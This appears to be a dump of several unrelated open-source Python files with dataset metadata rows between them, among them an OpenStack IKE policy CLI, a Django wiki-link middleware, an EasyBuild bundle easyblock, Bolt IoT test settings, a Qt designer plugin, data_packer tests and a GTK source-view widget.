client = self.app.client_manager.neutronclient
result = 0
for ike in parsed_args.ikepolicy:
try:
ike_id = client.find_resource(
'ikepolicy', ike, cmd_resource='ikepolicy')['id']
client.delete_ikepolicy(ike_id)
except Exception as e:
result += 1
LOG.error(_("Failed to delete IKE policy with "
"name or ID '%(ikepolicy)s': %(e)s"),
{'ikepolicy': ike, 'e': e})
if result > 0:
total = len(parsed_args.ikepolicy)
msg = (_("%(result)s of %(total)s IKE policy failed "
"to delete.") % {'result': result, 'total': total})
raise exceptions.CommandError(msg)
class ListIKEPolicy(command.Lister):
_description = _("List IKE policies that belong to a given project")
def get_parser(self, prog_name):
parser = super(ListIKEPolicy, self).get_parser(prog_name)
parser.add_argument(
'--long',
action='store_true',
help=_("List additional fields in output")
)
return parser
def take_action(self, parsed_args):
client = self.app.client_manager.neutronclient
obj = client.list_ikepolicies()['ikepolicies']
headers, columns = column_util.get_column_definitions(
_attr_map, long_listing=parsed_args.long)
return (headers, (utils.get_dict_properties(s, columns) for s in obj))
class SetIKEPolicy(command.Command):
_description = _("Set IKE policy properties")
def get_parser(self, prog_name):
parser = super(SetIKEPolicy, self).get_parser(prog_name)
_get_common_parser(parser)
parser.add_argument(
'--name',
metavar='<name>',
help=_('Name of the IKE policy'))
parser.add_argument(
'ikepolicy',
metavar='<ike-policy>',
help=_('IKE policy to set (name or ID)'))
return parser
def take_action(self, parsed_args):
client = self.app.client_manager.neutronclient
attrs = _get_common_attrs(self.app.client_manager,
parsed_args, is_create=False)
if parsed_args.name:
attrs['name'] = parsed_args.name
ike_id = client.find_resource(
'ikepolicy', parsed_args.ikepolicy,
cmd_resource='ikepolicy')['id']
try:
client.update_ikepolicy(ike_id, {'ikepolicy': attrs})
except Exception as e:
msg = (_("Failed to set IKE policy '%(ike)s': %(e)s")
% {'ike': parsed_args.ikepolicy, 'e': e})
raise exceptions.CommandError(msg)
class ShowIKEPolicy(command.ShowOne):
_description = _("Display IKE policy details")
def get_parser(self, prog_name):
parser = super(ShowIKEPolicy, self).get_parser(prog_name)
parser.add_argument(
'ikepolicy',
metavar='<ike-policy>',
help=_('IKE policy to display (name or ID)'))
return parser
def take_action(self, parsed_args):
client = self.app.client_manager.neutronclient
ike_id = client.find_resource(
'ikepolicy', parsed_args.ikepolicy,
cmd_resource='ikepolicy')['id']
obj = client.show_ikepolicy(ike_id)['ikepolicy']
columns, display_columns = column_util.get_columns(obj, _attr_map)
data = utils.get_dict_properties(obj, columns)
return (display_columns, data)
| apache-2.0 | -2,731,209,515,089,461,000 | 36.286885 | 78 | 0.612003 | false |
hzlf/openbroadcast | website/apps/alibrary/middleware/object_linker.py | 1 | 4611 | import re
from django.conf import settings
from django.db.models.loading import get_model
from django.core.cache import cache
from django.utils.safestring import mark_safe
class ObjectLinkerMiddleware(object):
def process_response(self, request, response):
print response['Content-Type']
""""""
if response['Content-Type'].split(';', 1)[0] == 'text/html':
content = response.content
response.content = expand_tokens(content)
return response
def expand_tokens(str):
str = wikify_string(str)
return str
def wikisafe_markdown(value):
from django.contrib.markup.templatetags.markup import markdown
return mark_safe(markdown(value.replace('[[','LBRACK666').replace(']]','RBRACK666')).replace('LBRACK666','[[').replace('RBRACK666',']]'))
class WikiException(Exception): # Raised when a particular string is not found in any of the models.
pass
def wikify(match): # Excepts a regexp match
wikis = [] # Here we store our wiki model info
for i in settings.WIKISYNTAX:
name = i[0]
modstring = i[1]
module = __import__(".".join(modstring.split(".")[:-1]))
for count, string in enumerate(modstring.split('.')):
if count == 0:
continue
module = getattr(module,string)
module.name = name
wikis.append(module())
token, trail = match.groups() # we track the 'trail' because it may be a plural 's' or something useful
if ':' in token:
"""
First we're checking if the text is attempting to find a specific type of object.
Exmaples:
[[user:Subsume]]
[[card:Jack of Hearts]]
"""
prefix = token.split(':',1)[0].lower().rstrip()
name = token.split(':',1)[1].rstrip()
for wiki in wikis:
if prefix == wiki.name:
if wiki.attempt(name,explicit=True):
"""
We still check attempt() because maybe
work is done in attempt that render relies on,
or maybe this is a false positive.
"""
return wiki.render(name,trail=trail,explicit=True)
else:
raise WikiException
"""
Now we're going to try a generic match across all our wiki objects.
Example:
[[Christopher Walken]]
[[Studio 54]]
[[Beverly Hills: 90210]] <-- notice ':' was confused earlier as a wiki prefix name
[[Cat]]s <-- will try to match 'Cat' but will include the plural
[[Cats]] <-- will try to match 'Cats' then 'Cat'
"""
for wiki in wikis:
if getattr(wiki,'prefix_only',None):
continue
if wiki.attempt(token):
return wiki.render(token,trail=trail)
"""
We tried everything we could and didn't find anything.
"""
raise WikiException("No item found for '%s'"% (token))
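# Illustrative settings entry (editor's sketch; the module paths are
# hypothetical): each WIKISYNTAX item maps a bracket prefix to the dotted path
# of a resolver class providing attempt()/render(), e.g.
#
#   WIKISYNTAX = [
#       ('user', 'myapp.wikilinks.UserWiki'),
#       ('card', 'myapp.wikilinks.CardWiki'),
#   ]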
class wikify_string(object):
def __call__(self, string, fail_silently=True):
self.fail_silently = fail_silently
self.cache = {}
self.set_cache = {}
#from wikisyntax import fix_unicode
WIKIBRACKETS = '\[\[([^\]]+?)\]\]'
if not string:
return ''
#string = fix_unicode.fix_unicode(string)
if getattr(settings,'WIKISYNTAX_DISABLE_CACHE',False) == False:
keys = re.findall(WIKIBRACKETS, string)
self.cache = cache.get_many([k.replace(' ','-').lower() for k in keys if len(k) < 251])
content = re.sub('%s(.*?)' % WIKIBRACKETS,self.markup_to_links,string)
cache.set_many(self.set_cache)
return content
def __new__(cls, string, **kwargs):
obj = super(wikify_string, cls).__new__(cls)
return obj(string, **kwargs)
def markup_to_links(self,match):
string = match.groups()[0].lower().replace(' ','-')
if getattr(settings,'WIKISYNTAX_DISABLE_CACHE',False) == False:
if string in self.cache:
return self.cache[string]
if string in self.set_cache:
return self.set_cache[string] # Maybe they typed it twice?
try:
new_val = wikify(match)
if getattr(settings,'WIKISYNTAX_DISABLE_CACHE',False) == False:
self.set_cache[string] = new_val
return new_val
except WikiException:
if not self.fail_silently:
raise
return string
| gpl-3.0 | 6,399,902,080,093,638,000 | 27.288344 | 141 | 0.563435 | false |
pescobar/easybuild-easyblocks | easybuild/easyblocks/generic/bundle.py | 1 | 11293 | ##
# Copyright 2009-2019 Ghent University
#
# This file is part of EasyBuild,
# originally created by the HPC team of Ghent University (http://ugent.be/hpc/en),
# with support of Ghent University (http://ugent.be/hpc),
# the Flemish Supercomputer Centre (VSC) (https://www.vscentrum.be),
# Flemish Research Foundation (FWO) (http://www.fwo.be/en)
# and the Department of Economy, Science and Innovation (EWI) (http://www.ewi-vlaanderen.be/en).
#
# https://github.com/easybuilders/easybuild
#
# EasyBuild is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation v2.
#
# EasyBuild is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with EasyBuild. If not, see <http://www.gnu.org/licenses/>.
##
"""
EasyBuild support for installing a bundle of modules, implemented as a generic easyblock
@author: Stijn De Weirdt (Ghent University)
@author: Dries Verdegem (Ghent University)
@author: Kenneth Hoste (Ghent University)
@author: Pieter De Baets (Ghent University)
@author: Jens Timmerman (Ghent University)
"""
import copy
import os
import easybuild.tools.environment as env
from easybuild.framework.easyblock import EasyBlock
from easybuild.framework.easyconfig import CUSTOM
from easybuild.framework.easyconfig.easyconfig import get_easyblock_class
from easybuild.tools.build_log import EasyBuildError, print_msg
from easybuild.tools.modules import get_software_root, get_software_version
class Bundle(EasyBlock):
"""
Bundle of modules: only generate module files, nothing to build/install
"""
@staticmethod
def extra_options(extra_vars=None):
"""Easyconfig parameters specific to bundles."""
if extra_vars is None:
extra_vars = {}
extra_vars.update({
'altroot': [None, "Software name of dependency to use to define $EBROOT for this bundle", CUSTOM],
'altversion': [None, "Software name of dependency to use to define $EBVERSION for this bundle", CUSTOM],
'default_component_specs': [{}, "Default specs to use for every component", CUSTOM],
'components': [(), "List of components to install: tuples w/ name, version and easyblock to use", CUSTOM],
'default_easyblock': [None, "Default easyblock to use for components", CUSTOM],
})
return EasyBlock.extra_options(extra_vars)
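    # Illustrative easyconfig snippet (editor's sketch, not a real easyconfig):
    # a bundle lists its parts in 'components' as (name, version, specs) tuples
    # and can supply shared defaults for every component, e.g.
    #
    #   easyblock = 'Bundle'
    #   default_easyblock = 'ConfigureMake'
    #   default_component_specs = {'sources': [SOURCE_TAR_GZ]}
    #   components = [
    #       ('libfoo', '1.2.3', {'start_dir': 'libfoo-%(version)s'}),
    #       ('libbar', '4.5', {'easyblock': 'CMakeMake'}),
    #   ]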
def __init__(self, *args, **kwargs):
"""Initialize easyblock."""
super(Bundle, self).__init__(*args, **kwargs)
self.altroot = None
self.altversion = None
# list of EasyConfig instances for components
self.comp_cfgs = []
# list of sources for bundle itself *must* be empty
if self.cfg['sources']:
raise EasyBuildError("List of sources for bundle itself must be empty, found %s", self.cfg['sources'])
# disable templating to avoid premature resolving of template values
self.cfg.enable_templating = False
# list of checksums for patches (must be included after checksums for sources)
checksums_patches = []
for comp in self.cfg['components']:
comp_name, comp_version, comp_specs = comp[0], comp[1], {}
if len(comp) == 3:
comp_specs = comp[2]
comp_cfg = self.cfg.copy()
easyblock = comp_specs.get('easyblock') or self.cfg['default_easyblock']
if easyblock is None:
raise EasyBuildError("No easyblock specified for component %s v%s", comp_cfg['name'],
comp_cfg['version'])
elif easyblock == 'Bundle':
raise EasyBuildError("The Bundle easyblock can not be used to install components in a bundle")
comp_cfg.easyblock = get_easyblock_class(easyblock, name=comp_cfg['name'])
# make sure that extra easyconfig parameters are known, so they can be set
extra_opts = comp_cfg.easyblock.extra_options()
comp_cfg.extend_params(copy.deepcopy(extra_opts))
comp_cfg['name'] = comp_name
comp_cfg['version'] = comp_version
comp_cfg.generate_template_values()
# do not inherit easyblock to use from parent (since that would result in an infinite loop in install_step)
comp_cfg['easyblock'] = None
# reset list of sources/source_urls/checksums
comp_cfg['sources'] = comp_cfg['source_urls'] = comp_cfg['checksums'] = []
for key in self.cfg['default_component_specs']:
comp_cfg[key] = self.cfg['default_component_specs'][key]
for key in comp_specs:
comp_cfg[key] = comp_specs[key]
# enable resolving of templates for component-specific EasyConfig instance
comp_cfg.enable_templating = True
# 'sources' is strictly required
if comp_cfg['sources']:
# If per-component source URLs are provided, attach them directly to the relevant sources
if comp_cfg['source_urls']:
for source in comp_cfg['sources']:
if isinstance(source, basestring):
self.cfg.update('sources', [{'filename': source, 'source_urls': comp_cfg['source_urls']}])
elif isinstance(source, dict):
# Update source_urls in the 'source' dict to use the one for the components
# (if it doesn't already exist)
if 'source_urls' not in source:
source['source_urls'] = comp_cfg['source_urls']
self.cfg.update('sources', [source])
else:
raise EasyBuildError("Source %s for component %s is neither a string nor a dict, cannot "
"process it.", source, comp_cfg['name'])
else:
# add component sources to list of sources
self.cfg.update('sources', comp_cfg['sources'])
else:
raise EasyBuildError("No sources specification for component %s v%s", comp_name, comp_version)
if comp_cfg['checksums']:
src_cnt = len(comp_cfg['sources'])
# add per-component checksums for sources to list of checksums
self.cfg.update('checksums', comp_cfg['checksums'][:src_cnt])
# add per-component checksums for patches to list of checksums for patches
checksums_patches.extend(comp_cfg['checksums'][src_cnt:])
self.comp_cfgs.append(comp_cfg)
self.cfg.update('checksums', checksums_patches)
self.cfg.enable_templating = True
def check_checksums(self):
"""
Check whether a SHA256 checksum is available for all sources & patches (incl. extensions).
:return: list of strings describing checksum issues (missing checksums, wrong checksum type, etc.)
"""
checksum_issues = []
for comp in self.comp_cfgs:
checksum_issues.extend(self.check_checksums_for(comp, sub="of component %s" % comp['name']))
return checksum_issues
def configure_step(self):
"""Collect altroot/altversion info."""
# pick up altroot/altversion, if they are defined
self.altroot = None
if self.cfg['altroot']:
self.altroot = get_software_root(self.cfg['altroot'])
self.altversion = None
if self.cfg['altversion']:
self.altversion = get_software_version(self.cfg['altversion'])
def build_step(self):
"""Do nothing."""
pass
def install_step(self):
"""Install components, if specified."""
comp_cnt = len(self.cfg['components'])
for idx, cfg in enumerate(self.comp_cfgs):
print_msg("installing bundle component %s v%s (%d/%d)..." % (cfg['name'], cfg['version'], idx+1, comp_cnt))
self.log.info("Installing component %s v%s using easyblock %s", cfg['name'], cfg['version'], cfg.easyblock)
comp = cfg.easyblock(cfg)
# correct build/install dirs
comp.builddir = self.builddir
comp.install_subdir, comp.installdir = self.install_subdir, self.installdir
# make sure we can build in parallel
comp.set_parallel()
# figure out correct start directory
comp.guess_start_dir()
# need to run fetch_patches to ensure per-component patches are applied
comp.fetch_patches()
# location of first unpacked source is used to determine where to apply patch(es)
comp.src = [{'finalpath': comp.cfg['start_dir']}]
# run relevant steps
for step_name in ['patch', 'configure', 'build', 'install']:
if step_name in cfg['skipsteps']:
comp.log.info("Skipping '%s' step for component %s v%s", step_name, cfg['name'], cfg['version'])
else:
comp.run_step(step_name, [lambda x: getattr(x, '%s_step' % step_name)])
# update environment to ensure stuff provided by former components can be picked up by latter components
# once the installation is finalised, this is handled by the generated module
reqs = comp.make_module_req_guess()
for envvar in reqs:
curr_val = os.getenv(envvar, '')
curr_paths = curr_val.split(os.pathsep)
for subdir in reqs[envvar]:
path = os.path.join(self.installdir, subdir)
if path not in curr_paths:
if curr_val:
new_val = '%s:%s' % (path, curr_val)
else:
new_val = path
env.setvar(envvar, new_val)
def make_module_extra(self, *args, **kwargs):
"""Set extra stuff in module file, e.g. $EBROOT*, $EBVERSION*, etc."""
if 'altroot' not in kwargs:
kwargs['altroot'] = self.altroot
if 'altversion' not in kwargs:
kwargs['altversion'] = self.altversion
return super(Bundle, self).make_module_extra(*args, **kwargs)
def sanity_check_step(self, *args, **kwargs):
"""
Nothing is being installed, so just being able to load the (fake) module is sufficient
"""
if self.cfg['exts_list'] or self.cfg['sanity_check_paths'] or self.cfg['sanity_check_commands']:
super(Bundle, self).sanity_check_step(*args, **kwargs)
else:
self.log.info("Testing loading of module '%s' by means of sanity check" % self.full_mod_name)
fake_mod_data = self.load_fake_module(purge=True)
self.log.debug("Cleaning up after testing loading of module")
self.clean_up_fake_module(fake_mod_data)
| gpl-2.0 | 4,453,393,424,235,920,000 | 43.992032 | 119 | 0.604002 | false |
Inventrom/bolt-api-python | tests/config.py | 1 | 1907 | """This file contains all the configurations for unit testing."""
# Configurations for testing GPIO related functions.
GPIO_CONFIG = {
"VALID_PIN": '0',
"VALID_DIGITAL_WRITE_VALUE": "HIGH",
"INVALID_PIN": "16",
"INVALID_DIGITAL_WRITE_VALUE": "MEDIUM",
"SUCCESS_RESPONSE": '1',
"FAILED_RESPONSE": '0',
"INVALID_PIN_RESPONSE": "Invalid pin value",
"INVALID_STATE_RESPONSE": "Invalid state",
"ANALOG_WRITE_VALUE": "100",
"ANALOG_READ_PIN": "A0",
"ANALOG_WRITE_PIN": '0',
"READ_VALUE": "0"
}
# Configurations for testing UART realted functions.
UART_CONFIG = {
"SUCCESS_RESPONSE": '1',
"FAILED_RESPONSE": '0',
"VALID_BAUD_RATE": "9600",
"INVALID_BAUD_RATE": "10",
"VALID_BAUD_RESPONSE": "Success",
"INVALID_BAUD_RESPONSE": "Invalid baud value",
"VALID_TILL": "10",
"INVALID_TILL": "1000",
"VALID_TILL_VALUE": "",
"INVALID_TILL_VALUE": "Invalid till value",
"VALID_WRITE_VALUE": "hello",
"INVALID_WRITE_VALUE": "Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.",
"VALID_DATA_RESPONSE": "Serial write Successful",
"INVALID_DATA_RESPONSE": "Command timed out"
}
# Configurations for testing Utilities realted functions.
UTILITY_CONFIG = {
"SUCCESS_RESPONSE": '1',
"FAILED_RESPONSE": '0',
"RESTART_RESPONSE": "Restarted",
"RESTART_ALTERNATIVE_RESPONSE": "Command timed out",
"ONLINE_VALUE": "online"
}
# User configurations.
CREDENTIALS = {
"API_KEY": "xxxx",
"DEVICE_ID": "xxxx"
}
| mit | -4,648,685,357,361,712,000 | 37.14 | 475 | 0.676455 | false |
FreshXOpenSource/wallaby-frontend-qt | wallaby/frontends/qt/plugins/datetimeeditplugin.py | 1 | 1683 | # Copyright (c) by it's authors.
# Some rights reserved. See LICENSE, AUTHORS.
import wallaby.FXUI as FXUI
from wallaby.qt_combat import *
from wallaby.frontends.qt.widgets.edits.dateTimeEdit import DateTimeEdit
#============================================================================#
# The group name in designer widgetbox #
#----------------------------------------------------------------------------#
DESIGNER_GROUP_NAME = "wallaby@fX"
#============================================================================#
# Plugin for CTLiveView #
#----------------------------------------------------------------------------#
class DateTimeEditPlugin(QtDesigner.QPyDesignerCustomWidgetPlugin):
def __init__(self, parent=None):
super(DateTimeEditPlugin, self).__init__(parent)
self.initialized = False
def initialize(self, formEditor):
if self.initialized:
return
self.initialized = True
def isInitialized(self):
return self.initialized
def isContainer(self):
return False
def icon(self):
return FXUI.icon()
def domXml(self):
return '<widget class="DateTimeEdit" name="dateTimeEdit">\n</widget>\n'
def group(self):
return DESIGNER_GROUP_NAME
def includeFile(self):
return "wallaby.frontends.qt.widgets.edits.dateTimeEdit"
def name(self):
return "DateTimeEdit"
def toolTip(self):
return ""
def whatsThis(self):
return ""
def createWidget(self, parent):
return DateTimeEdit(parent)
| bsd-2-clause | 7,495,198,909,785,957,000 | 28.017241 | 79 | 0.496732 | false |
bat-serjo/vivisect | vstruct/cparse.py | 3 | 5364 | from pycparser import c_parser
import pycparser.c_ast as c_ast
import vstruct
import vstruct.primitives as vs_prim
class StructParser:
def __init__(self, psize=4, bigend=False):
self.psize = psize
self.pclass = vs_prim.v_ptr32
self.cls_parsers = {
c_ast.Decl: self.c_getVsDecl,
c_ast.Struct: self.c_getVsStruct,
c_ast.FileAST: self.c_getFileAst,
c_ast.PtrDecl: self.c_getPointer,
#c_ast.FuncDecl: self.c_getFuncDecl,
c_ast.Constant: self.c_getConstant,
c_ast.TypeDecl: self.c_getVsType,
c_ast.ArrayDecl: self.c_getVsArray,
c_ast.IdentifierType: self.c_getIdentType,
}
self.vs_ctypes = {
('char',): vs_prim.v_int8,
('unsigned','char'): vs_prim.v_uint8,
('short',): vs_prim.v_int16,
('short','int'): vs_prim.v_int16,
('unsigned', 'short',): vs_prim.v_uint16,
('unsigned', 'short','int'):vs_prim.v_uint16,
('int',): vs_prim.v_int32,
('unsigned','int',): vs_prim.v_uint32,
('long',): vs_prim.v_int32,
('long','int'): vs_prim.v_int32,
('unsigned','long',): vs_prim.v_uint32,
('unsigned','long','int'): vs_prim.v_uint32,
}
if psize == 8:
self.pclass = vs_prim.v_ptr64
self.vs_ctypes.update({
('long',): vs_prim.v_int64,
('long', 'int'): vs_prim.v_int64,
('long', 'long'): vs_prim.v_int64,
('unsigned', 'long',): vs_prim.v_uint64,
('unsigned', 'long', 'int'): vs_prim.v_uint64,
('unsigned', 'long', 'long'): vs_prim.v_uint64,
})
def _getVsChildElements(self, astelem):
return [ self._getVsElement( c ) for c in astelem[1].children() ]
def _getVsElement(self, astelem):
# An ast element comes as a tuple of namething, realstuff
namething,elem = astelem
p = self.cls_parsers.get( elem.__class__ )
if p is None:
raise Exception('OMG NO PARSER FOR: %r' % elem)
return p( astelem )
def c_getPointer(self, pdecl):
vsclass = self._getVsChildElements( pdecl )[ 0 ]
return self.pclass
def c_getVsArray(self, ardecl):
cls, size = self._getVsChildElements(ardecl)
# Special case char arrays into v_bytes
if cls == vs_prim.v_int8:
return lambda: vs_prim.v_str(size=size)
return lambda: vstruct.VArray( [ cls() for i in range(size) ] )
def c_getIdentType(self, itelem):
ename, einst = itelem
c = self.vs_ctypes.get(tuple(einst.names))
if not c:
raise Exception('Un-plumbed type: %r' % (einst.names,))
return c
def c_getVsType(self, idelem):
ename, einst = idelem
cls = self._getVsChildElements(idelem)[0]
return cls
def c_getVsDecl(self, decelem):
decname = decelem[1].name
return decname,self._getVsChildElements(decelem)[0]
def c_getVsStruct(self, selem):
sname,sinst = selem
def bstruct():
vs = vstruct.VStruct()
vs._vs_name = sinst.name
for cname,chclass in self._getVsChildElements( selem ):
vobj = chclass()
vs.vsAddField(cname, vobj)
return vs
return bstruct
def c_getFileAst(self, elem):
return self._getVsChildElements(elem)
def c_getConstant(self, celem):
return int(celem[1].value)
def c_getFuncDecl(self, felem):
raise NotImplementedError("Implement function declaration parsing!")
def parseStructSource(self, src):
src = preProcessSource( src )
parser = c_parser.CParser()
ast = parser.parse(src)
#ast.show()
for child in ast.children():
xname, decl = self._getVsElement( child )
yield decl
def preProcessSource( src ):
'''
Carry out some *very* basic pre-processor parsing on the given source.
    (its only function for now is removing "//" style comments!)
'''
lines = src.splitlines()
return '\n'.join( [ line.split('//')[0] for line in lines ] )
def ctorFromCSource(src, psize=4, bigend=False):
'''
Parse and return a callable constructor for the
input C structure source.
'''
p = StructParser(psize=psize, bigend=bigend)
return list(p.parseStructSource( src ))[0]
def vsFromCSource(src, psize=4, bigend=False):
'''
Return a vsobj for a structure parsed from C.
'''
return ctorFromCSource(src, psize, bigend)()
class CVStruct(object):
'''
struct example {
int x;
char y[30];
int *z;
};
'''
psize = 4
bigend = False
def __new__(self):
return vsFromCSource(self.__doc__, self.psize, self.bigend)
class awesome(CVStruct):
'''
struct awesome {
int x,z;
char stuff[20];
int y;
struct haha {
int blah;
} s;
int *q;
};
'''
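# Hedged usage sketch (added for illustration; not part of the original module).
# It only exercises names defined above; the `_vs_name` attribute read below is
# set explicitly in c_getVsStruct(), so no further vstruct API is assumed.
if __name__ == '__main__':
    # Build a structure directly from C source...
    pt = vsFromCSource('struct pt { int x; int y; char tag[4]; };')
    # ...or by instantiating a CVStruct subclass, which parses its own docstring.
    aw = awesome()
    print(pt._vs_name, aw._vs_name)  # -> pt awesome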
| apache-2.0 | -1,098,476,479,139,844,100 | 29.651429 | 76 | 0.527778 | false |
ideascf/data-packer | test/field/test_single.py | 1 | 5915 | # coding=utf-8
"""
Standalone examples for individual field types
"""
import pytest
from data_packer import DefaultField, OptionalField, PlaceholderField, RequiredField, MagicField
from data_packer import container, err, constant, checker, converter
import data_packer
from _common import run
g_src = {
'a': 1,
'b': 'hello',
'c': ['a', 'b', 'c'],
'd': {
'1': 1,
'2': 2,
},
'e': {
'1': ['a', 'b'],
'2': {
'a': 'a',
'b': 'b'
}
}
}
g_src = container.DictContainer(g_src)
#### Default-value field ####
def test_default():
    # With an input value
fields = [
DefaultField('defalut', src_name='a', dst_name='a')
]
dst = run(fields, g_src)
assert dst['a'] == g_src['a']
    # Without an input value
fields = [
DefaultField('default value', src_name='Not Exist', dst_name='Dst name')
]
dst = run(fields, g_src)
assert dst['Dst name'] == 'default value'
#### Optional field ####
def test_optional():
    # With an input value
fields = [
OptionalField('b', 'dst name')
]
dst = run(fields, g_src)
assert dst['dst name'] == g_src['b']
    # Without an input value
fields = [
OptionalField('Not Exist', 'dst name')
]
dst = run(fields, g_src)
assert dst == {}
#### Placeholder field ####
def test_placeholder():
    # With an input value
fields = [
PlaceholderField('b', 'dst name')
]
dst = run(fields, g_src)
assert dst == {}
    # Without an input value
fields = [
PlaceholderField('Not Exist', 'dst name')
]
dst = run(fields, g_src)
assert dst == {}
#### Required field ####
def test_required():
    # With an input value
fields = [
RequiredField('b', 'dst name')
]
dst = run(fields, g_src)
assert dst['dst name'] == g_src['b']
    # Without an input value
fields = [
RequiredField('Not Exist', 'dst name')
]
with pytest.raises(data_packer.err.DataPackerSrcKeyNotFoundError):
run(fields, g_src)
class TestMagicField:
def setup_method(self, test_method):
self.field = MagicField('src_name', 'dst_name',
constant.OverwriteMode.OVERWRITE,
checker=checker.NullChecker(), converter=converter.NullConverter())
def test_call_directly(self):
field = MagicField('src_name')
with pytest.raises(err.DataPackerProgramError):
field.run(None, None)
def test_r(self):
r = self.field.r()
        # Only the field type changes; the attributes stay the same
assert isinstance(r, RequiredField)
assert r.src_name == self.field.src_name
assert r.dst_name == self.field.dst_name
assert r._overwrite == self.field._overwrite
assert r._checker_list == self.field._checker_list
assert r._converter_list == self.field._converter_list
        # Change both the field type and the field attributes
r = self.field.r(src_name='xyz', dst_name='zyx',
overwrite=constant.OverwriteMode.RAISE, checker=None, converter=None)
assert isinstance(r, RequiredField)
assert r.src_name == 'xyz' and r.src_name != self.field.src_name
assert r.dst_name == 'zyx' and r.src_name != self.field.dst_name
assert r._overwrite == constant.OverwriteMode.RAISE and r._overwrite != self.field._overwrite
assert r._checker_list == None and r._checker_list != self.field._checker_list
assert r._converter_list == None and r._converter_list != self.field._converter_list
def test_o(self):
o = self.field.o()
        # Only the field type changes; the attributes stay the same
assert isinstance(o, OptionalField)
assert o.src_name == self.field.src_name
assert o.dst_name == self.field.dst_name
assert o._overwrite == self.field._overwrite
assert o._checker_list == self.field._checker_list
assert o._converter_list == self.field._converter_list
        # Change both the field type and the field attributes
o = self.field.o(src_name='xyz', dst_name='zyx',
overwrite=constant.OverwriteMode.RAISE, checker=None, converter=None)
assert isinstance(o, OptionalField)
assert o.src_name == 'xyz' and o.src_name != self.field.src_name
assert o.dst_name == 'zyx' and o.src_name != self.field.dst_name
assert o._overwrite == constant.OverwriteMode.RAISE and o._overwrite != self.field._overwrite
assert o._checker_list == None and o._checker_list != self.field._checker_list
assert o._converter_list == None and o._converter_list != self.field._converter_list
def test_d(self):
import uuid
default_value = uuid.uuid4().hex
        # Only the field type changes; the attributes stay the same
d = self.field.d(default_value)
assert isinstance(d, DefaultField)
assert d.src_name == self.field.src_name
assert d.dst_name == self.field.dst_name
assert d._overwrite == self.field._overwrite
assert d._checker_list == self.field._checker_list
assert d._converter_list == self.field._converter_list
assert d.default_value == default_value
        # Change both the field type and the field attributes
d = self.field.d(default_value, src_name='xyz', dst_name='zyx',
overwrite=constant.OverwriteMode.RAISE, checker=None, converter=None)
assert isinstance(d, DefaultField)
assert d.default_value == default_value
assert d.src_name == 'xyz' and d.src_name != self.field.src_name
assert d.dst_name == 'zyx' and d.src_name != self.field.dst_name
assert d._overwrite == constant.OverwriteMode.RAISE and d._overwrite != self.field._overwrite
assert d._checker_list == None and d._checker_list != self.field._checker_list
assert d._converter_list == None and d._converter_list != self.field._converter_list
| mit | -1,970,213,070,541,719,000 | 31.408046 | 101 | 0.587161 | false |
mfnch/pyrtist | pyrtist/gui/srcview.py | 1 | 4813 | # Copyright (C) 2011 Matteo Franchin
#
# This file is part of Pyrtist.
#
# Pyrtist is free software: you can redistribute it and/or modify it
# under the terms of the GNU Lesser General Public License as published
# by the Free Software Foundation, either version 2.1 of the License, or
# (at your option) any later version.
#
# Pyrtist is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with Pyrtist. If not, see <http://www.gnu.org/licenses/>.
import gtk
import config
from undoer import Undoer
# Functions for the undoer.
def delete_fn(_, srcview, del_offs, del_len):
buf = srcview.buf
del_start = buf.get_iter_at_offset(del_offs)
del_end = buf.get_iter_at_offset(del_offs + del_len)
buf.delete(del_start, del_end)
buf.place_cursor(del_start)
def insert_fn(_, srcview, ins_text, ins_offs):
buf = srcview.buf
ins_start = buf.get_iter_at_offset(ins_offs)
buf.insert(ins_start, ins_text)
cursor_pos = buf.get_iter_at_offset(ins_offs + len(ins_text))
buf.place_cursor(cursor_pos)
class BoxSrcView(object):
def _init_textview(self):
view = gtk.TextView()
buf = view.get_buffer()
return (0, view, buf)
def _init_gtksourceview1(self):
try:
import gtksourceview
srcbuf = gtksourceview.SourceBuffer()
langman = gtksourceview.SourceLanguagesManager()
lang = langman.get_language_from_mime_type("text/x-csrc")
srcbuf.set_language(lang)
srcbuf.set_highlight(True)
srcview = gtksourceview.SourceView(srcbuf)
srcview.set_show_line_numbers(True)
return (1, srcview, srcbuf)
except:
return None
def _init_gtksourceview2(self):
try:
import gtksourceview2 as gtksourceview
srcbuf = gtksourceview.Buffer()
langman = gtksourceview.LanguageManager()
search_paths = langman.get_search_path()
search_paths.append(config.get_hl_path())
langman.set_search_path(search_paths)
lang = langman.get_language("python")
srcbuf.set_language(lang)
srcbuf.set_highlight_syntax(True)
srcview = gtksourceview.View(srcbuf)
srcview.set_show_line_numbers(True)
srcview.set_auto_indent(True)
return (2, srcview, srcbuf)
except:
return None
def __init__(self, use_gtksourceview=True, quickdoc=None, undoer=None):
"""Create a new sourceview using gtksourceview2 or gtksourceview,
if they are available, otherwise return a TextView.
"""
self.quickdoc = quickdoc
self.undoer = undoer or Undoer()
first = (0 if use_gtksourceview else 2)
init_fns = [self._init_gtksourceview2,
self._init_gtksourceview1,
self._init_textview]
for attempted_mode in range(first, 3):
mode_view_buf = init_fns[attempted_mode]()
if mode_view_buf:
break
mode, view, buf = mode_view_buf
self.mode = mode
self.view = view
self.buf = buf
view.set_wrap_mode(gtk.WRAP_WORD)
view.set_property("has-tooltip", True)
view.connect("query-tooltip", self._sighandler_query_tooltip)
buf.connect("insert-text", self._sighandler_insert_text)
buf.connect("delete-range", self._sighandler_delete_range)
def _sighandler_query_tooltip(self, srcview, x, y, keyb_mode, tooltip, *etc):
word = self.get_word_at_coords(x, y)
if word != None:
qd = self.quickdoc
if qd != None:
text = qd(word)
if text != None and len(text) > 0:
tooltip.set_text(text)
return True
else:
return False
